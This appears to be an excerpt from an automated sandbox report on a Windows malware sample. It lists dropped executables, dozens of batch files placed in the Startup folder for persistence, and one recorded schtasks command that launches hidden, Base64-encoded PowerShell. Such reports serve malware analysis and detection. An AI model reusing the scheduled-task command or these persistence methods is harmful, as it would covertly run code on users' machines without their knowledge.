Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\0V9EbnB8e6ebVrU36pWfpYPt.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\0NiGzKSTtDzAUZOkgD66xsNo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\jjBbyETsrLuQI8Jbex8HWhsj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\rSTe50KCC8r8EbtF86ijRMYC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\rCKApTO5apcF0CWhs5J6G9uw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\7kfsbB1Hl48Vwwq14EpVnfnY.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\LuhjrDkHbg5EV9gJjZgRzNRC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\jHK91yJ3AAbdMiBNHu82OP1N.exe	Jump to dropped file
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211413039667704.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\zuTkcDdNQ6MkLeAs0lGPxvRR.exe	Jump to dropped file
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2311211412517277356.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\pQ6uZvesO0d4NLicCWC7lXTs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\SpYVqZtUE8xSk6PWbKVpMU9E.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\oImNnZUwq_S8lQXQ3JQ8PWfa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\PG0i0imJz19jFNp7ko6pIPRA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\OeIzFpPQv96lBLRJ074Q8fw6.exe	Jump to dropped file

Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151231039.log
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151237920.log
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151300960.log
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151306388.log

Boot Survival

Drops script or batch files to the startup folder

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BDrGDlTifOLZNiBUheyxYQtf.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IytYR3GaQ4RFrbtAYXGTLQtf.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cic3atRc7HSpHHcbjylG6maa.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eAUqpjxpbFDLZaZ1AQVOgtKP.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ElrigHO2FOmeuoC12a7pqHAf.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LwUEIn0u42avRg7NWL5JGs75.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PABqbTMgez7HPLFgfI7iEGKK.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kkzr4mGHkQP8vGs5ZY8tXyMX.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\18MDOkFiY6RdLnWW80t2YsVS.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EygRHTeIn4ytbQctqBrMquUw.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\huuoI3mgyMLYKjTLIuAXQWar.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zeOfkDDOQWsuppdm74AXgsYG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5TEYLaQFPYWqJgYXoDmRWNi.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoKc3jku73co21M6XP2XzBRm.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z5DD5HpkX1Fb1WMRS4timOqh.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pDDy4C7ODvZ435lhBIaTACmF.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C9Hw9d8EA13BUssagnw4SgFG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pAREVsdPZxbAcdElaNfgA9u9.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AS0hnlpl66MtE0KLhjjOLNaC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0JbGAE3KWGgTpIlSSHYLLbge.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TLgdyWgnb7EJQJfbIypXhtcL.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XTYZUGwZm67eusiXt60bjnqI.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RXXz6AwumQHorbsNNmZw4Pww.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kEBolTmB6JUkmTcImCo9ZSC6.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwXwSVZ6Bpyqj9zWj5xtHD5n.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\24rGNt7xruGwxynNphkn310O.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mBxCGAyk3eKGc4MZLyYxeLOy.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vDK8Bjmbw8F7jtFi7BU7EIjV.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BdRu2tx6AXdnZcn7C2ODMWN7.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GB2b4OJnWSzsNtUT1nZRgmw1.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SIKVPo862RPOlBMaWJXbLGPP.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5QDpHdUdPGqfrvwvPMstJLuM.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2MEjFMZug16QWjxKckULCLHU.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jWFEGUWi14gR1AWFpLYSOhTH.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3XGozpYaJZRrKXHyg56y1gn3.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYMjdo3T2nSbnrOG6PatZCjh.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zZ9jOiBMLvJKs94l3cO5LDjk.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ko575jpDDsNgcbo2IqHs6mp6.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Y87U0VRLdseZNHdoAA2kzQqw.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koaSsTsT2PMDFnZOK5S6wqpH.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pV7bNqhswqirJjyAS8jsaYbX.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pnqpJHJE2BLMcX2uUHb5y3NC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4v3zAm9R6NxAyWSDdrEyRjzv.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1Yy5iZU6IPX6zyfA19jJov5.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1huP7mnhhz1BBpC7Bieke4SE.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D7FXOCqUp7wquexSy2TvNclL.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zc1Hpjg06kEPCxYidXtEteEN.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kjutPwsIKLqBhucfBslkDjha.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rEEjiqeukO2VRDjzOoMgF5Q1.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAvIV9KXqIbkAjzNox8lXuKB.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtFnqAp3vyKFpGtqe42Vqai7.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TDQQApkr2dU5GmHw4L6zCiF1.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ojtScMFaD01HvY9V5pRywyo4.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PenbNlY4v1Vx62WE0q81zcDp.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xUwcy6wbvWLGo9dph4cGTShV.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\baSSXz9sAE0QHo2h7YMHDYBf.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vekKtIb4HbI5SpYmoZ3cGvXG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\83TGfv1Q8Lh4D7c36336nVkD.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q3fqgNhMYYgFvw2BYJwts0px.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MQZXOAxlVcqy3RceiFUn5ftC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cV1tlOprRXahIPEmfiEzl2VK.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qWXpKBmjAr0pZUqYzGRLsjpF.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I5UVn2ElA1TC7bAAmh5QM3ft.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O46ClWDJJ0ChccNYUTHhX6rG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCiIx4VC3BFIDXCPws8D583o.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TesNDksP9JpUl8dcPzgHr5lv.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uomg7UlX27UwbG3UUxP7ZMNG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LUsq7upEG2iiN4NxycmpIBDM.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9DzcdBj68Lp4dGPdGwvZEsfD.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xzk1C1rQiwgJE4mEfBRZiYfJ.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y2xUHCgSGKPsCWSBr4ueFeFq.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2jNh70feoWdNeZn43S0Jdfru.bat	Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LwUEIn0u42avRg7NWL5JGs75.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PABqbTMgez7HPLFgfI7iEGKK.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zeOfkDDOQWsuppdm74AXgsYG.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C9Hw9d8EA13BUssagnw4SgFG.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pAREVsdPZxbAcdElaNfgA9u9.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AS0hnlpl66MtE0KLhjjOLNaC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BdRu2tx6AXdnZcn7C2ODMWN7.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GB2b4OJnWSzsNtUT1nZRgmw1.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3XGozpYaJZRrKXHyg56y1gn3.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYMjdo3T2nSbnrOG6PatZCjh.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zZ9jOiBMLvJKs94l3cO5LDjk.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4v3zAm9R6NxAyWSDdrEyRjzv.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1Yy5iZU6IPX6zyfA19jJov5.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1huP7mnhhz1BBpC7Bieke4SE.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAvIV9KXqIbkAjzNox8lXuKB.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtFnqAp3vyKFpGtqe42Vqai7.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TDQQApkr2dU5GmHw4L6zCiF1.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\baSSXz9sAE0QHo2h7YMHDYBf.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BDrGDlTifOLZNiBUheyxYQtf.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eAUqpjxpbFDLZaZ1AQVOgtKP.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kkzr4mGHkQP8vGs5ZY8tXyMX.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\huuoI3mgyMLYKjTLIuAXQWar.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z5DD5HpkX1Fb1WMRS4timOqh.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pDDy4C7ODvZ435lhBIaTACmF.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TLgdyWgnb7EJQJfbIypXhtcL.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwXwSVZ6Bpyqj9zWj5xtHD5n.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\24rGNt7xruGwxynNphkn310O.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SIKVPo862RPOlBMaWJXbLGPP.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Y87U0VRLdseZNHdoAA2kzQqw.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pV7bNqhswqirJjyAS8jsaYbX.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D7FXOCqUp7wquexSy2TvNclL.bat	Jump to behavior
